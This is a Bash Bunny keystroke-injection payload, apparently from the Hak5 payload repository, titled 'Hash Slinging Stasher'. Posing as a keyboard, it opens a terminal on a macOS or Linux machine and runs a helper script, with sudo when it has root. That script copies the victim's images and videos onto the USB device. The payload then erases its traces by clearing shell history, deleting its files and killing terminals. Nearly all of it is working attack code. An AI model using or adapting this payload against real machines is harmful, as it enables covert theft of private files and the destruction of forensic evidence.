mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
1871ceb8e6
-Export variables where possible -Also improved history clearing functionality and un-setting variables
176 lines
4.3 KiB
Plaintext
Executable File
176 lines
4.3 KiB
Plaintext
Executable File
# Title: Hash Slinging Stasher for Bash Bunny
|
|
# Description: Copies files to Bash Bunny udisk from the target OS matching given extensions and file size only if their checksum does not appear in a user defined or generated checksum list, and appends the checksum of copied files to that list.
|
|
# Author: theSW4n
|
|
# Version: 1.0
|
|
# Category: Exfiltration
|
|
# Target: Tested on MacOS 13.x/14.0, Ubuntu 22.04.3 LTS, Manjaro 23.0.4, and Kali Linux 2023.3 (not compatible with Windows)
|
|
# Attackmodes: HID, Storage
|
|
|
|
# Options
|
|
hss_target_directory=/
|
|
hss_target_extensions="jpg jpeg gif bmp raw webp psd orf rw2 flv webm ogg h264 hevc heic heif dng cr2 tiff crw nef pef mov qt mp4 m4p m4v mpg mpe mpv m2v svi 3gp 3g2 mpeg avi wmv mts m2ts ts png"
|
|
hss_find_file_size=+10k
|
|
DRIVE_LABEL="BashBunny"
|
|
|
|
######## SETUP PHASE ########
|
|
LED SETUP
|
|
GET SWITCH_POSITION
|
|
mount /dev/nandf /root/udisk
|
|
rm -rf /root/HSS
|
|
cp -r /root/udisk/payloads/${SWITCH_POSITION} /root/HSS
|
|
sync
|
|
umount /dev/nandf
|
|
udisk mount
|
|
mv -f /root/HSS /root/udisk/HSS
|
|
sync
|
|
udisk umount
|
|
ATTACKMODE HID STORAGE
|
|
|
|
######## ATTACK PHASE ########
|
|
LED ATTACK
|
|
QUACK GUI SPACE
|
|
QUACK GUI
|
|
QUACK STRING "terminal"
|
|
QUACK ENTER
|
|
QUACK DELAY 1500
|
|
QUACK STRING "qterminal"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "n"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "gnome-terminal"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "n"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "xterm"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "n"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "konsole"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "n"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "lxterminal"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "n"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "urxvt"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "n"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "st"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "n"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "alacritty"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "n"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "xfce4-terminal"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "n"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "tilda"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "n"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "udisksctl mount -b /dev/disk/by-label/$DRIVE_LABEL"
|
|
QUACK ENTER
|
|
QUACK DELAY 1500
|
|
QUACK STRING "cp -rf \$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)/HSS /tmp"
|
|
QUACK ENTER
|
|
QUACK DELAY 1500
|
|
QUACK STRING "chmod -R 755 /tmp/HSS"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "cd /tmp/HSS"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "/bin/bash"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "target_directory=$hss_target_directory"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "export target_directory"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "target_extensions=\""$hss_target_extensions\"""
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "export target_extensions"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "find_file_size=$hss_find_file_size"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "export find_file_size"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "DRIVE_LABEL=$DRIVE_LABEL"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "export DRIVE_LABEL"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "if [ \""\$EUID\"" -ne 0 ]; then \$(find ~+ -name"
|
|
QUACK STRING " \""hss_bbscript.sh\""); else \$(sudo \$(find ~+ -name"
|
|
QUACK STRING " \""hss_bbscript.sh\"")); fi"
|
|
QUACK ENTER
|
|
QUACK DELAY 1000
|
|
sync
|
|
|
|
QUACK STRING "exit"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "export HISTIGNORE=\""*\"""
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "cd /"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "rm -rf /tmp/HSS"
|
|
QUACK ENTER
|
|
QUACK DELAY 1500
|
|
QUACK STRING "rm -rf \$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)/HSS"
|
|
QUACK ENTER
|
|
QUACK DELAY 1500
|
|
QUACK STRING "udisksctl unmount -b /dev/disk/by-label/$DRIVE_LABEL"
|
|
QUACK ENTER
|
|
QUACK DELAY 1500
|
|
QUACK STRING "diskutil eject \$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)"
|
|
QUACK ENTER
|
|
QUACK DELAY 2000
|
|
QUACK STRING "unset target_directory & unset target_extensions & unset find_file_size & unset DRIVE_LABEL"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "history -c && history -w"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK STRING "killall qterminal & killall gnome-terminal- & killall Terminal & killall xterm & killall konsole & killall lxterminal & killall urxvt & killall st & killall alacritty & killall xfce4-terminal & killall tilda"
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
sync
|
|
|
|
LED FINISH
|
|
|